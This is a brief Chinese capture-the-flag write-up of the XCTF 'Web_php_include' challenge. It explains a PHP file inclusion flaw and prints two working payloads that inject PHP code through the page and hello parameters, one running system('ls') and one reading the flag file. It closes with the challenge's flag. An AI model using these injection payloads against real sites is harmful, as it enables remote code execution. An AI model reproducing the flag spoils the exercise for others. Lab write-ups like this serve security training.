攻防世界web进阶区之Web_php_include

攻防世界web进阶区之Web_php_include代码审计后我们会发现存在文件包含漏洞。
借助hello参数构建payload:?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>攻防世界web进阶区之Web_php_include然后借助参数?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>即可得到flag
攻防世界web进阶区之Web_php_includectf{876a5fca-96c6-4cbd-9075-46f0c89475d2}